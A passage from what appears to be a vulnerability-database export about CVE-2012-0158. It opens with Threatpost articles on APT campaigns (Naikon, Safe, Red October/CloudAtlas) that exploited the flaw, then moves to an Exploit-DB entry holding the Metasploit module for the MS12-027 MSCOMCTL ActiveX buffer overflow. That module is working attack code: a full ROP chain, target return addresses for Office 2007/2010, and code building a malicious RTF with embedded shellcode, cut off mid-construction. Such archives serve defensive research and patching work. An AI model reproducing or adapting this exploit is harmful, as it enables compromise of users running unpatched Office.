a soldier, but as an academic. The researchers determined through a variety of avenues that Ge is an active member of the military, having published research as a member of the military, in addition to numerous postings to social media as an officer and via his access to secure locations believed to be headquarters to the PLA unit\u2019s technical reconnaissance bureau.\n\n\u201cDoing this kind of biopsy, if you will, of this threat through direct analysis of the technical and non-technical evidence allows us to paint a picture of the rest of this group\u2019s activity,\u201d said Rich Barger, CIO and cofounder of ThreatConnect. \u201cWe\u2019ve had hundreds of hashes, hundreds of domains, and thousands of IPs [related to PLA unit 78020]. Only looking at this from a technical lens only gives you so much. When you bring in a regional, cultural and even language aspect to it, you can derive more context that gets folded over and over into the technical findings and continues to refine additional meaning that we can apply to the broader group itself.\u201d\n\nThe report also highlights a number of operational security mistakes Ge made to inadvertently give himself away, such as using the same handle within the group\u2019s infrastructure, even embedding certain names in families of malware attributed to them. All of this combined with similar mistakes made across the command and control infrastructure and evidence pulled from posts on social media proved to be enough to tie Ge to the Naikon group and elite PLA unit that is making gains in the region.\n\n\u201cIf you look at where China is and how assertive they are in region, it might be a reflection of some of the gains and wins this group has made,\u201d Barger said. \u201cYou don\u2019t influence what they\u2019re influencing in the region if you don\u2019t have the intel support capabilities fueling that operational machine.\u201d\n", "modified": "2015-09-25T13:01:29", "published": "2015-09-24T13:37:36", "id": "THREATPOST:9CD19A6A1B939482B336348DA5D2F47C", "href": "https://threatpost.com/naikon-apt-group-tied-to-chinas-pla-unit-78020/114798/", "type": "threatpost", "title": "China PLA Unit 78020 Cyberespionage Naikon APT", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:00:46", "bulletinFamily": "info", "description": "More and more, we\u2019re hearing about a crossing of the streams, if you will, between cybercrime and state-sponsored attackers. Elements of malware, code persistence and distribution techniques are bleeding over between one realm of hacking into the other as each side tries to fill gaps in their respective portfolios.\n\nThe most recent example comes from Safe, a targeted espionage malware campaign recently reported on by Trend Micro. Safe has all the elements of a state-sponsored endeavor yet it seems to have been written by a third-party professional software developer with textbook code snippets, extensive commenting throughout the source code and an air of commercialization.\n\n\u201cAs the tools used in targeted attacks are exposed, attackers may look for new custom malware to circumvent defenses. As a result, attackers may increasingly look to the cybercriminal underground for new malicious tools instead of developing their own tools for exclusive use,\u201d wrote Kyle Wilhoit and Nart Villeneuve in a paper.\n\nSafe, named after the filenames given to of the several malware components, has hit a relatively small number of targets, namely nongovernmental organizations (NGOs), technology companies, government agencies, academic research institutions and media companies. To date, nearly 12,000 unique IP addresses from more than 100 countries have connected to a pair of command and control infrastructures.\n\nEach command and control server had its own set of marching orders for the malware and targets. One snared just three live victims, the report said, most of those in Mongolia, while the other had significantly more, and most of those connections originated in India, the U.S., China and Pakistan.\n\nFrom clues discovered from a misconfiguration on one of the C&C servers, the researchers were able to see all of its directories, view victim information and download backup archives that included source code used for the server and malware.\n\n\u201cThis is realistically about a developer who may be cybercrime oriented, but a malware campaign that is espionage oriented,\u201d Wilhoit told Threatpost, who added that this type of professional code development is not uncommon in either the cybercrime or cyberespionage arenas.\n\nAttacks begin with spear phishing emails containing spiked Microsoft Office documents exploiting a vulnerability in CVE-2012-0158. The spear phishing messages are targeting Tibetan activists with information about an interview with the exiled Dalai Lama. The attachment is titled: NBC Interview Excerpts. CVE-2012-0158 was also used in the [Red October espionage campaign](<http://threatpost.com/inside-1000-red-october-cyberespionage-malware-modules-011713/>) as well as other attacks against [Tibetan activists](<http://threatpost.com/researchers-uncover-targeted-attack-campaign-using-android-malware-032613/>) in China or in exile elsewhere worldwide.\n\nOnce the document is executed, the victim sees a decoy document while files are downloaded in the background, including a .dll file called Safe.Ext which contains the malware and SafeCredential.DAT which contains an Rc4 encryption key as well as command and control server information and the targets. Each victim is assigned a unique identifier. The second stage of the attack then executes and a number of data exfiltration plug-ins are installed, as well as a number of credential-stealing tools targeting the major browsers and Remote Desktop Protocol.\n\nAside from the malware, the two C&C servers don\u2019t seem to have anything in common. While one uses Mongolian domain names, the second holds nonsensical domain names such as getapencil[.]com. No attack vectors have been discovered for the second server, Trend Micro said. The domains in the second server are registered to a wanxian at 126[.]com, the same address used to register another 17 domains including five C&C servers used in the iMuler and Enfal malware campaigns, Trend Micro said.\n\nThe researchers\u2019 access to the source code illustrated the professionalism at play with this campaign. Apparently, the author had access to source code from a Chinese ISP and used that code in the building of the C&C server.\n\n\u201cWe believe the malware author is a professional software engineer that is familiar with version control. We also found indicators that this individual is proficient in software development due to the high quality of the source code he used. The entire source code was explicitly written with future development in mind. It was modularized and heavily commented on in a way that allows further development even by several engineers,\u201d the paper said. \u201cThese qualities are traditionally seen in the work of professional software engineers that have been taught traditional computer science.\u201d\n\nWilhoit told Threatpost they are still investigating and would not release any specific information about targets or the types of data being exfiltrated.\n", "modified": "2013-05-23T10:56:25", "published": "2013-05-20T14:47:14", "id": "THREATPOST:2154D4513B1B000120D100B6FE1F0D83", "href": "https://threatpost.com/targeted-espionage-attack-borrowing-from-cybercriminals/100705/", "type": "threatpost", "title": "Safe Targeted Espionage Campaign Borrows from Cybercriminals", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:57:43", "bulletinFamily": "info", "description": "The attackers behind the [Red October APT campaign](<https://threatpost.com/rocra-espionage-malware-campaign-uncovered-after-five-years-activity-011413>) that was exposed nearly two years ago have resurfaced with a new campaign that is targeting some of the same victims and using similarly constructed tools and spear phishing emails.\n\nRed October emerged in January 2013 and researchers found that the attackers were targeting diplomats in some Eastern European countries, government agencies and research organizations with malware that could steal data from desktops, mobile devices and FTP servers. The attackers had a wide variety of tools at their disposal and used unique victim IDs and had exploits for a number of vulnerabilities. The Red October attacks began with highly targeted spear phishing emails, some of which advertised a diplomatic car for sale.\n\nThe new CloudAtlas campaign, disclosed Wednesday by researchers at Kaspersky Lab, also uses that same spear phishing lure and as targeted some of the same victims hit by Red October. Researchers believe the same group may be behind both campaigns, based on similarities in tactics, tools and targets.\n\n\u201cIn August 2014, some of our users observed targeted attacks with a variation of [CVE-2012-0158](<http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0158>) and an unusual set of malware. We did a quick analysis of the malware and it immediately stood out because of certain unusual things that are not very common in the APT world,\u201d researchers at Kaspersky said in an [analysis](<https://securelist.com/blog/research/68083/cloud-atlas-redoctober-apt-is-back-in-style/>) of the attack. \n\n\u201cAt least one of them immediately reminded us of RedOctober, which used a very similarly named spearphish: \u201cDiplomatic Car for Sale.doc\u201d. As we started digging into the operation, more details emerged which supported this theory. Perhaps the most unusual fact was that the Microsoft Office exploit didn\u2019t directly write a Windows PE backdoor on disk. Instead, it writes an encrypted Visual Basic Script and runs it.\u201d\n\nBoth Red October and CloudAtlas have targeted the same victims. Not just the same organizations, but some of the same machines.\n\nBoth Red October and CloudAtlas have targeted the same victims. Not just the same organizations, but some of the same machines. In one case, a machine was attacked only twice in the last two years, once by Red October and once by CloudAtlas. Both campaigns also hit victims in the same countries: Russia, Belarus, Kazakhstan and India. The two campaigns also use similar malware tools.\n\n\u201cBoth Cloud Atlas and RedOctober malware implants rely on a similar construct, with a loader and the final payload that is stored encrypted and compressed in an external file. There are some important differences though, especially in the encryption algorithms used \u2013 RC4 in RedOctober vs AES in Cloud Atlas,\u201d Kaspersky researchers said.\n\n\u201cThe usage of the compression algorithms in Cloud Atlas and RedOctober is another interesting similarity. Both malicious programs share the code for LZMA compression algorithm. In CloudAtlas it is used to compress the logs and to decompress the decrypted payload from the C&C servers, while in Red October the \u2018scheduler\u2019 plugin uses it to decompress executable payloads from the C&C.\u201d\n\nThe C2 infrastructure for the CloudAtlas campaign is somewhat unusual. The attackers are using accounts at Swedish cloud provider CloudMe to communicate with compromised machines.\n\n\u201cThe attackers upload data to the account, which is downloaded by the implant, decrypted and interpreted. In turn, the malware uploads the replies back to the server via the same mechanism,\u201d the researchers said.\n\nOfficials at CloudMe said on Twitter that they are working to delete any CloudAtlas C2 accounts.\n\n\u201cYes, we are permanently deleting all accounts that we can identify as involved in the [#inception](<https://twitter.com/hashtag/inception?src=hash>) [#cloudatlas](<https://twitter.com/hashtag/cloudatlas?src=hash>) [#apt](<https://twitter.com/hashtag/apt?src=hash>) [#surveillance](<https://twitter.com/hashtag/surveillance?src=hash>),\u201d the company [said](<https://twitter.com/CloudMe_com/status/542636290274246656>).\n\nResearchers at Blue Coat have also looked at the new campaign, which they\u2019ve named Inception, and found that the attackers have created tools to compromise a variety of mobile platforms, as well.\n\n\u201cThe framework continues to evolve. Blue Coat Lab researchers have recently found that the attackers have also created malware for Android, BlackBerry and iOS devices to gather information from victims, as well as seemingly planned MMS phishing campaigns to mobile devices of targeted individuals. To date, Blue Coat has observed over 60 mobile providers such as China Mobile, O2, Orange, SingTel, T-Mobile and Vodafone, included in these preparations, but the real number is likely far higher,\u201d Snorre Fagerland and Waylon Grange from Blue Coat Lab wrote.\n\n_Image from Flickr photos of [Kevin Dooley](<https://www.flickr.com/photos/pagedooley/>). _\n", "modified": "2014-12-11T17:50:33", "published": "2014-12-10T11:12:07", "id": "THREATPOST:3DFDEBADB4BEE8782EFBEA4D06EB5605", "href": "https://threatpost.com/red-october-attackers-return-with-cloudatlas-apt-campaign/109806/", "type": "threatpost", "title": "Red October Attackers Return With CloudAtlas APT Campaign", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-02-02T10:26:20", "bulletinFamily": "exploit", "description": "MS12-027 MSCOMCTL ActiveX Buffer Overflow. CVE-2012-0158. Remote exploit for windows platform", "modified": "2012-04-25T00:00:00", "published": "2012-04-25T00:00:00", "id": "EDB-ID:18780", "href": "https://www.exploit-db.com/exploits/18780/", "type": "exploitdb", "title": "WIndows - MSCOMCTL ActiveX Buffer Overflow MS12-027", "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# web site for more information on licensing and terms of use.\r\n# http://metasploit.com/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = AverageRanking\r\n\r\n\tinclude Msf::Exploit::FILEFORMAT\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'MS12-027 MSCOMCTL ActiveX Buffer Overflow',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a stack buffer overflow in MSCOMCTL.OCX. It uses a malicious\r\n\t\t\t\tRTF to embed the specially crafted MSComctlLib.ListViewCtrl.2 Control as exploited\r\n\t\t\t\tin the wild on April 2012.\r\n\r\n\t\t\t\tThis module targets Office 2007 and Office 2010 targets. The DEP/ASLR bypass on Office\r\n\t\t\t\t2010 is done with the Ikazuchi ROP chain proposed by Abysssec. This chain uses\r\n\t\t\t\t\"msgr3en.dll\", which will load after office got load, so the malicious file must\r\n\t\t\t\tbe loaded through \"File / Open\" to achieve exploitation.\r\n\t\t\t},\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Author' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t'Unknown', # Vulnerability discovery\r\n\t\t\t\t\t'juan vazquez', # Metasploit module\r\n\t\t\t\t\t'sinn3r' # Metasploit module\r\n\t\t\t\t],\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2012-0158' ],\r\n\t\t\t\t\t[ 'OSVDB', '81125' ],\r\n\t\t\t\t\t[ 'BID', '52911' ],\r\n\t\t\t\t\t[ 'MSB', 'MS12-027' ],\r\n\t\t\t\t\t[ 'URL', 'http://contagiodump.blogspot.com.es/2012/04/cve2012-0158-south-china-sea-insider.html' ],\r\n\t\t\t\t\t[ 'URL', 'http://abysssec.com/files/The_Arashi.pdf' ]\r\n\t\t\t\t],\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => 'process',\r\n\t\t\t\t},\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'PrependEncoder' => \"\\x81\\xc4\\x54\\xf2\\xff\\xff\", # Stack adjustment # add esp, -3500,\r\n\t\t\t\t\t'Space' => 900,\r\n\t\t\t\t\t'BadChars' => \"\\x00\",\r\n\t\t\t\t\t'DisableNops' => true # no need\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t# winword.exe v12.0.4518.1014 (No Service Pack)\r\n\t\t\t\t\t# winword.exe v12.0.6211.1000 (SP1)\r\n\t\t\t\t\t# winword.exe v12.0.6425.1000 (SP2)\r\n\t\t\t\t\t# winword.exe v12.0.6612.1000 (SP3)\r\n\t\t\t\t\t[ 'Microsoft Office 2007 [no-SP/SP1/SP2/SP3] English on Windows [XP SP3 / 7 SP1] English',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Offset' => 270,\r\n\t\t\t\t\t\t\t'Ret' => 0x27583c30, # jmp esp # MSCOMCTL.ocx 6.1.95.45\r\n\t\t\t\t\t\t\t'Rop' => false\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t\t# winword.exe v14.0.6024.1000 (SP1)\r\n\t\t\t\t\t[ 'Microsoft Office 2010 SP1 English on Windows [XP SP3 / 7 SP1] English',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Ret' => 0x3F2CB9E1, # ret # msgr3en.dll\r\n\t\t\t\t\t\t\t'Rop' => true,\r\n\t\t\t\t\t\t\t'RopOffset' => 120\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t],\r\n\t\t\t'DisclosureDate' => 'Apr 10 2012',\r\n\t\t\t'DefaultTarget' => 0))\r\n\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOptString.new('FILENAME', [ true, 'The file name.', 'msf.doc']),\r\n\t\t\t], self.class)\r\n\tend\r\n\r\n\tdef stream(bytes)\r\n\t\tRex::Text.to_hex(bytes).gsub(\"\\\\x\", \"\")\r\n\tend\r\n\r\n\tdef junk(n=1)\r\n\t\ttmp = []\r\n\t\tvalue = rand_text(4).unpack(\"L\")[0].to_i\r\n\t\tn.times { tmp << value }\r\n\t\treturn tmp\r\n\tend\r\n\r\n\t# Ikazuchi ROP chain (msgr3en.dll)\r\n\t# Credits to Abysssec\r\n\t# http://abysssec.com/files/The_Arashi.pdf\r\n\tdef create_rop_chain\r\n\t\trop_gadgets = [\r\n\t\t\t0x3F2CB9E0, # POP ECX # RETN\r\n\t\t\t0x3F10115C, # HeapCreate() IAT = 3F10115C\r\n\t\t\t# EAX == HeapCreate() Address\r\n\t\t\t0x3F389CA5, # MOV EAX,DWORD PTR DS:[ECX] # RETN\r\n\t\t\t# Call HeapCreate() and Create a Executable Heap. After this call, EAX contain our Heap Address.\r\n\t\t\t0x3F39AFCF, # CALL EAX # RETN\r\n\t\t\t0x00040000,\r\n\t\t\t0x00010000,\r\n\t\t\t0x00000000,\r\n\t\t\t0x3F2CB9E0, # POP ECX # RETN\r\n\t\t\t0x00008000, # pop 0x00008000 into ECX\r\n\t\t\t# add ECX to EAX and instead of calling HeapAlloc, now EAX point to the RWX Heap\r\n\t\t\t0x3F39CB46, # ADD EAX,ECX # POP ESI # RETN\r\n\t\t\tjunk,\r\n\t\t\t0x3F2CB9E0, # POP ECX # RETN\r\n\t\t\t0x3F3B3DC0, # pop 0x3F3B3DC0 into ECX, it is a writable address.\r\n\t\t\t# storing our RWX Heap Address into 0x3F3B3DC0 ( ECX ) for further use ;)\r\n\t\t\t0x3F2233CC, # MOV DWORD PTR DS:[ECX],EAX # RETN\r\n\t\t\t0x3F2D59DF, #POP EAX # ADD DWORD PTR DS:[EAX],ESP # RETN\r\n\t\t\t0x3F3B3DC4, # pop 0x3F3B3DC4 into EAX , it is writable address with zero!\r\n\t\t\t\t\t\t\t\t\t# then we add ESP to the Zero which result in storing ESP into that address,\r\n\t\t\t\t\t\t\t\t\t# we need ESP address for copying shellcode ( which stores in Stack ),\r\n\t\t\t\t\t\t\t\t\t# and we have to get it dynamically at run-time, now with my tricky instruction, we have it!\r\n\t\t\t0x3F2F18CC, # POP EAX # RETN\r\n\t\t\t0x3F3B3DC4, # pop 0x3F3B3DC4 ( ESP address ) into EAX\r\n\t\t\t# makes ECX point to nearly offset of Stack.\r\n\t\t\t0x3F2B745E, # MOV ECX,DWORD PTR DS:[EAX] #RETN\r\n\t\t\t0x3F39795E, # POP EDX # RETN\r\n\t\t\t0x00000024, # pop 0x00000024 into EDX\r\n\t\t\t# add 0x24 to ECX ( Stack address )\r\n\t\t\t0x3F39CB44, # ADD ECX,EDX # ADD EAX,ECX # POP ESI # RETN\r\n\t\t\tjunk,\r\n\t\t\t# EAX = ECX\r\n\t\t\t0x3F398267, # MOV EAX,ECX # RETN\r\n\t\t\t# mov EAX ( Stack Address + 24 = Current ESP value ) into the current Stack Location,\r\n\t\t\t# and the popping it into ESI ! now ESI point where shellcode stores in stack\r\n\t\t\t0x3F3A16DE, # MOV DWORD PTR DS:[ECX],EAX # XOR EAX,EAX # POP ESI # RETN\r\n\t\t\t# EAX = ECX\r\n\t\t\t0x3F398267, # MOV EAX,ECX # RETN\r\n\t\t\t0x3F2CB9E0, # POP ECX # RETN\r\n\t\t\t0x3F3B3DC0, # pop 0x3F3B3DC0 ( Saved Heap address ) into ECX\r\n\t\t\t# makes EAX point to our RWX Heap\r\n\t\t\t0x3F389CA5, # MOV EAX,DWORD PTR DS:[ECX] # RETN\r\n\t\t\t# makes EDI = Our RWX Heap Address\r\n\t\t\t0x3F2B0A7C, # XCHG EAX,EDI # RETN 4\r\n\t\t\t0x3F2CB9E0, # POP ECX # RETN\r\n\t\t\tjunk,\r\n\t\t\t0x3F3B3DC0, # pop 0x3F3B3DC0 ( Saved Heap address ) into ECX\r\n\t\t\t# makes EAX point to our RWX Heap\r\n\t\t\t0x3F389CA5, # MOV EAX,DWORD PTR DS:[ECX] # RETN\r\n\t\t\t# just skip some junks\r\n\t\t\t0x3F38BEFB, # ADD AL,58 # RETN\r\n\t\t\t0x3F2CB9E0, # POP ECX # RETN\r\n\t\t\t0x00000300, # pop 0x00000300 into ECX ( 0x300 * 4 = Copy lent )\r\n\t\t\t# Copy shellcode from stack into RWX Heap\r\n\t\t\t0x3F3441B4, # REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS:[ESI] # POP EDI # POP ESI # RETN\r\n\t\t\tjunk(2), # pop into edi # pop into esi\r\n\t\t\t0x3F39AFCF # CALL EAX # RETN\r\n\t\t].flatten.pack(\"V*\")\r\n\r\n\t\t# To avoid shellcode being corrupted in the stack before ret\r\n\t\trop_gadgets << \"\\x90\" * target['RopOffset'] # make_nops doesn't have sense here\r\n\t\treturn rop_gadgets\r\n\r\n\tend\r\n\r\n\tdef exploit\r\n\r\n\t\tret_address = stream([target.ret].pack(\"V\"))\r\n\r\n\t\tif target['Rop']\r\n\t\t\tshellcode = stream(create_rop_chain)\r\n\t\telse\r\n\t\t\t# To avoid shellcode being corrupted in the stack before ret\r\n\t\t\tshellcode = stream(make_nops(target['Offset']))\r\n\t\t\tshellcode << stream(Metasm::Shellcode.assemble(Metasm::Ia32.new, \"jmp $+6\").encode_string)\r\n\t\t\tshellcode << stream(make_nops(4))\r\n\t\tend\r\n\t\tshellcode << stream(payload.encoded)\r\n\t\twhile shellcode.length < 2378\r\n\t\t\tshellcode += \"0\"\r\n\t\tend\r\n\r\n\t\tcontent = \"{\\\\rtf1\"\r\n\t\tcontent << \"{\\\\fonttbl{\\\\f0\\\\fnil\\\\fcharset0 Verdana;}}\"\r\n\t\tcontent << \"\\\\viewkind4\\\\uc1\\\\pard\\\\sb100\\\\sa100\\\\lang9\\\\f0\\\\fs22\\\\par\"\r\n\t\tcontent << \"\\\\pard\\\\sa200\\\\sl276\\\\slmult1\\\\lang9\\\\fs22\\\\par\"\r\n\t\tcontent << \"{\\\\object\\\\objocx\"\r\n\t\tcontent << \"{\\\\*\\\\objdata\"\r\n\t\tcontent << \"\\n\"\r\n\t\tcontent << \"01050000020000001B0000004D53436F6D63746C4C69622E4C697374566965774374726C2E320000\"\r\n\t\tcontent << \"00000000000000000E0000\"\r\n\t\tcontent << \"\\n\"\r\n\t\tcontent << \"D0CF11E0A1B11AE1000000000000000000000000000000003E000300FEFF09000600000000000000\"\r\n\t\tcontent << \"00000000010000000100000000000000001000000200000001000000FEFFFFFF0000000000000000\"\r\n\t\tcontent << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\"\r\n\t\tcontent << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\"\r\n\t\tcontent << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\"\r\n\t\tcontent << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\"\r\n\t\tcontent << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\"\r\n\t\tcontent << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\"\r\n\t\tcontent << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\"\r\n\t\tcontent << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\"\r\n\t\tcontent << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\"\r\n\t\tcontent << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\"\r\n\t\tcontent << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFDFFFFFFFEFFFFFF\"\r\n\t\tcontent << \"FEFFFFFF0400000005000000FEFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\"\r\n\t\tcontent << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\"\r\n\t\tcontent << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\"\r\n\t\tcontent << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\"\r\n\t\tcontent << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\"\r\n\t\tcontent << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\"\r\n\t\tcontent << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\"\r\n\t\tcontent << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\"\r\n\t\tcontent << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\"\r\n\t\tcontent << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\"\r\n\t\tcontent << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\"\r\n\t\tcontent << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\"\r\n\t\tcontent << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF52006F006F007400200045006E007400\"\r\n\t\tcontent << \"72007900000000000000000000000000000000000000000000000000000000000000000000000000\"\r\n\t\tcontent << \"000000000000000016000500FFFFFFFFFFFFFFFF020000004BF0D1BD8B85D111B16A00C0F0283628\"\r\n\t\tcontent << \"0000000062eaDFB9340DCD014559DFB9340DCD0103000000000600000000000003004F0062006A00\"\r\n\t\tcontent << \"49006E0066006F000000000000000000000000000000000000000000000000000000000000000000\"\r\n\t\tcontent << \"0000000000000000000000000000000012000200FFFFFFFFFFFFFFFFFFFFFFFF0000000000000000\"\r\n\t\tcontent << \"00000000000000000000000000000000000000000000000000000000000000000600000000000000\"\r\n\t\tcontent << \"03004F00430058004E0041004D004500000000000000000000000000000000000000000000000000\"\r\n\t\tcontent << \"000000000000000000000000000000000000000000000000120002010100000003000000FFFFFFFF\"\r\n\t\tcontent << \"00000000000000000000000000000000000000000000000000000000000000000000000001000000\"\r\n\t\tcontent << \"160000000000000043006F006E00740065006E007400730000000000000000000000000000000000\"\r\n\t\tcontent << \"000000000000000000000000000000000000000000000000000000000000000012000200FFFFFFFF\"\r\n\t\tcontent << \"FFFFFFFFFFFFFFFF0000000000000000000000000000000000000000000000000000000000000000\"\r\n\t\tcontent << \"00000000020000007E05000000000000FEFFFFFFFEFFFFFF03000000040000000500000006000000\"\r\n\t\tcontent << \"0700000008000000090000000A0000000B0000000C0000000D0000000E0000000F00000010000000\"\r\n\t\tcontent << \"11000000120000001300000014000000150000001600000017000000FEFFFFFFFFFFFFFFFFFFFFFF\"\r\n\t\tcontent << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\"\r\n\t\tcontent << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\"\r\n\t\tcontent << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\"\r\n\t\tcontent << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\"\r\n\t\tcontent << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\"\r\n\t\tcontent << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\"\r\n\t\tcontent << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\"\r\n\t\tcontent << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\"\r\n\t\tcontent << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\"\r\n\t\tcontent << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\"\r\n\t\tcontent << \"FFFFFFFFFFFFFFFF0092030004000000000000000000000000000000000000000000000000000000\"\r\n\t\tcontent << \"00000000000000000000000000000000000000000000000000000000000000004C00690073007400\"\r\n\t\tcontent << \"56006900650077004100000000000000000000000000000000000000000000000000000000000000\"\r\n\t\tcontent << \"0000000000000000000000000000000021433412080000006ab0822cbb0500004E087DEB01000600\"\r\n\t\tcontent << \"1C000000000000000000000000060001560A000001EFCDAB00000500985D65010700000008000080\"\r\n\t\tcontent << \"05000080000000000000000000000000000000001FDEECBD01000500901719000000080000004974\"\r\n\t\tcontent << \"6D736400000002000000010000000C000000436F626A640000008282000082820000000000000000\"\r\n\t\tcontent << \"000000000000\"\r\n\t\tcontent << ret_address\r\n\t\tcontent << \"9090909090909090\"\r\n\t\tcontent << shellcode\r\n\t\tcontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\n\t\tcontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\n\t\tcontent << 